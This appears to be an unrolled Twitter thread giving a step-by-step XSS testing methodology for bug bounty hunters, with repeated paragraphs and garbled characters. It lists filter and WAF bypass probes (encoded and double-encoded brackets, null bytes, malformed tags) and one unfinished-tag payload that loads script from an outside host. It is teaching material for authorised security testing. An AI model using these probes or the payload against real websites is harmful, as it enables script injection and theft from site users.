Bug Testing Methodology Series:
πππ (ππ«π¨π¬π¬ ππ’ππ πππ«π’π©ππ’π§π )
Learn how to test for #XSS step by step on real #bugbounty programs.
Threadπ§΅π
#cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
πππ (ππ«π¨π¬π¬ ππ’ππ πππ«π’π©ππ’π§π )
Learn how to test for #XSS step by step on real #bugbounty programs.
Threadπ§΅π
#cybersecurity #cybersecuritytips #infosec #hacking #bugbountytips #infosecurity
Before we start, it should be mentioned that this thread will only focus on the testing methodology of XSS, not teaching how it works.
If you don't already know what XSS is, check this out β‘οΈ portswigger.net/web-security/cβ¦
If you don't already know what XSS is, check this out β‘οΈ portswigger.net/web-security/cβ¦
1οΈβ£ Look for reflections
This is the first step in finding XSS.
Anywhere you see user input is reflected in the response (not limited to what you see on the page, it could be in source code/HTTP response only), note the location/parameter down, that's a potential attack vector.
This is the first step in finding XSS.
Anywhere you see user input is reflected in the response (not limited to what you see on the page, it could be in source code/HTTP response only), note the location/parameter down, that's a potential attack vector.
2οΈβ£ Testing encodings/unusual behavior
If at first your usual XSS payload doesn't work (99% times), don't let it go straight away, most times there will be a filter/WAF in place, which could be bypassed.
Firstly, figure out how they handle input, don't jump straight into XSS.
If at first your usual XSS payload doesn't work (99% times), don't let it go straight away, most times there will be a filter/WAF in place, which could be bypassed.
Firstly, figure out how they handle input, don't jump straight into XSS.
They might filter <script>, but how do they handle non-harmful HTML tags such as <u>?
If they encode <> ,what happens if you provide already encoded tags such as %3C or <
Test for double encoding --> %253C , %26lt;
Not many people know about "οΌ"--> hackerone.com/reports/639684
If they encode <> ,what happens if you provide already encoded tags such as %3C or <
Test for double encoding --> %253C , %26lt;
Not many people know about "οΌ"--> hackerone.com/reports/639684
Try %00 (null byte), %09, %0A%0D, %07, %0a, %0d + a lot more of these.
Try unfinished tags (<script src=//14.rs?c=), malformed tags (\<a ; <x/a>) ,etc.
Use @owasp's XSS Filter Evasion for this β‘οΈ cheatsheetseries.owasp.org/cheatsheets/XSβ¦
Try unfinished tags (<script src=//14.rs?c=), malformed tags (\<a ; <x/a>) ,etc.
Use @owasp's XSS Filter Evasion for this β‘οΈ cheatsheetseries.owasp.org/cheatsheets/XSβ¦
@owasp 3οΈβ£ Payloads
To help with identifying weird behavior, I've already put together a list of payloads:
Don't rely on these though, in most cases you have to craft your own payload based on the target/location which requires you to think a little, so put that π§ to work
Pop the XSS
To help with identifying weird behavior, I've already put together a list of payloads:
Don't rely on these though, in most cases you have to craft your own payload based on the target/location which requires you to think a little, so put that π§ to work
Pop the XSS
https://twitter.com/850708045411823616/status/1573829647388770305
βBonus tip
When dealing with a custom filter/WAF , try to infiltrate the mind of the developers and reverse engineer their thoughts.
If there's a filter in place, that might mean that param is vulnerable, and they tried fixing it.
Why is a filter there? how does it work? etc
When dealing with a custom filter/WAF , try to infiltrate the mind of the developers and reverse engineer their thoughts.
If there's a filter in place, that might mean that param is vulnerable, and they tried fixing it.
Why is a filter there? how does it work? etc
Here is a snippet to save from @zseano's amazing methodology he has out there, make sure to check it out β‘οΈ bugbountyhunter.com/methodology/zsβ¦ 
@zseano That's a wrap!
If you enjoyed this thread:
1. Follow me @shrekysec for more of these
2. RT the tweet below to share this thread with your audience
Also, let me know what bug class I should make a testing methodology nextπ
If you enjoyed this thread:
1. Follow me @shrekysec for more of these
2. RT the tweet below to share this thread with your audience
Also, let me know what bug class I should make a testing methodology nextπ
https://twitter.com/850708045411823616/status/1577764184137338901
β’ β’ β’
Missing some Tweet in this thread? You can try to
force a refresh
γ
